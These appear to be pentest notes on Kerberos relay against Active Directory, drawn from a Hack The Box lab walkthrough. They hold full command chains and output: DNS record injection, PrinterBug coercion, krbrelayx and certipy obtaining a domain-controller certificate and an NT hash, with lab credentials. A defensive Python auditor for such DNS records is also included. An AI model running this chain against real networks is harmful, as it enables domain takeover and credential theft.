Kerberos Relay
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
1. Exploitation
Prerequisites:
- Neither the target service nor the client may enforce encryption or signing, because we do not hold the key (the session key) needed to perform those operations; this is the same constraint as in NTLM relay attacks.
1.1. DCOM/RPC local activation
Abuse a DCOM object to make the system authenticate to the attacker; this requires a domain-joined machine on which commands can be executed.
Using RemoteKrbRelay
# Kerberos relay to obtain a domain controller certificate
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
# Convert the base64-encoded certificate into a file
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
# Authenticate with the certificate
certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
1.2. Serialized (marshalled) SPN + DNS
By injecting a DNS record whose name carries a serialized SPN, the target is tricked into starting Kerberos authentication, which upgrades an NTLM relay to a Kerberos relay.
Add the DNS record (note that a DNS label is at most 63 characters and the shortest serialized buffer is 44 characters, so your netbios_name can be at most 19 characters long):
netbios_name + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
# 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA is the shortest serialized buffer that fits within the DNS length limit
The client will request a Kerberos ticket for cifs/netbios_name, but will actually connect to netbios_name1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
Example: relaying with krbrelayx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added

┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx

┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file

┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*]     Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
Using certipy
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
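From the defender's side, the DNS rule stated above (63-character label limit, 44-character minimum serialized buffer that starts with "1", so at most 19 characters of host name in front of it) is enough to audit an AD-integrated zone for records of this shape. The following is an added example written for these notes; it is not code from krbrelayx, bloodyAD, certipy or the original author. The character set assumed for the serialized buffer (A-Z, a-z, 0-9, "#", "-") is an assumption, and every sample record and host name in it is constructed, not real zone data.

```python
"""Audit DNS record names for serialized-SPN suffixes of the kind described above.

Added defensive example, not part of the original notes. Rule applied: a DNS
label is at most 63 characters, the shortest serialized buffer is 44 characters
starting with '1', so a label whose tail is a '1' followed by 43 or more
base64-like characters is suspect. The alphabet of that tail is an assumption.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

MAX_LABEL_LEN = 63                                   # RFC 1035 per-label limit
MIN_MARSHALLED_LEN = 44                              # '1' + 43 chars, per the notes
MAX_PREFIX_LEN = MAX_LABEL_LEN - MIN_MARSHALLED_LEN   # 19, as the notes state

# Assumed alphabet of the serialized buffer (hypothetical, see docstring).
_TAIL_RE = re.compile(r"^1[A-Za-z0-9#\-]{43,}$")

# The 44-character buffer quoted in the notes: '1UWhRC' + 32 x 'A' + 'YBAAAA'.
MARSHALLED_TAIL = "1UWhRC" + "A" * 32 + "YBAAAA"


def candidate_splits(label: str) -> List[Tuple[str, str]]:
    """Every (host_prefix, tail) split where the tail looks like a serialized buffer."""
    return [
        (label[:pos], label[pos:])
        for pos, ch in enumerate(label)
        if ch == "1" and _TAIL_RE.match(label[pos:])
    ]


def split_serialized(label: str, known_hosts: Iterable[str] = ()) -> Optional[Tuple[str, str]]:
    """Return (host_prefix, tail) for a label carrying a serialized-SPN suffix, else None.

    A host name may itself contain '1' (e.g. WS-102), so when an inventory of
    known host names is supplied the split whose prefix is a known host wins;
    otherwise the rightmost '1' is used, which is correct unless the buffer
    itself contains a '1'.
    """
    splits = candidate_splits(label)
    if not splits:
        return None
    known = {h.upper() for h in known_hosts}
    for prefix, tail in splits:
        if prefix.upper() in known:
            return prefix, tail
    return splits[-1]


@dataclass
class Finding:
    record: str             # full DNS record name as found in the zone
    impersonated_host: str  # name the client builds its SPN from (cifs/<host>)
    tail: str               # serialized buffer appended to that name
    known_host: bool        # prefix matches a computer in the inventory


def audit_records(records: Iterable[str], known_hosts: Iterable[str] = ()) -> List[Finding]:
    """Flag zone records whose first label ends in a serialized-SPN buffer."""
    known = {h.upper() for h in known_hosts}
    findings: List[Finding] = []
    for rec in records:
        label = rec.split(".", 1)[0]
        if len(label) > MAX_LABEL_LEN:
            continue  # not a valid DNS label; nothing to parse
        split = split_serialized(label, known_hosts)
        if split is None:
            continue
        prefix, tail = split
        findings.append(Finding(rec, prefix, tail, prefix.upper() in known))
    return findings


# Constructed sample zone (not real data): two benign names, one record shaped
# like the one in the notes, one whose host part itself contains a digit 1.
SAMPLE_RECORDS = [
    "DC-JPQ225.cicada.vl",
    "fileserver01.cicada.vl",
    "DC-JPQ225" + MARSHALLED_TAIL + ".cicada.vl",
    "WS-102" + MARSHALLED_TAIL + ".cicada.vl",
    "a-very-long-but-legitimate-hostname-label.cicada.vl",
]
SAMPLE_HOSTS = ["DC-JPQ225", "FILESERVER01", "WS-102"]

if __name__ == "__main__":
    for f in audit_records(SAMPLE_RECORDS, SAMPLE_HOSTS):
        status = "known host" if f.known_host else "unknown host"
        print(f"{f.record}: serialized suffix after {f.impersonated_host!r} ({status})")
```

Feed it the A records of the AD-integrated zone together with the computer inventory; a hit whose prefix is a known host is the record a client would resolve when it builds a ticket for cifs/<host> and then connects to the attacker-controlled address, which is exactly the condition the notes rely on. The same check belongs in DNS record creation auditing, since the record in the example above was added with ordinary dnsRecord write rights.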
The following explanation was generated by AI:
Target address format
│
├── IP address (e.g. 10.10.10.10)
│   └── ❌ No SPN can be built → NTLM is used
│
├── NetBIOS name (e.g. DC01)
│   └── Kerberos is attempted → may fall back to NTLM
│
├── FQDN (e.g. dc01.domain.local)
│   └── Kerberos is attempted (SPN: HOST/dc01.domain.local)
│       → falls back to NTLM on failure
│
└── Serialized SPN format (e.g. DC-JPQ2251UWhRC...)
    └── ✅ Forces Kerberos, no fallback to NTLM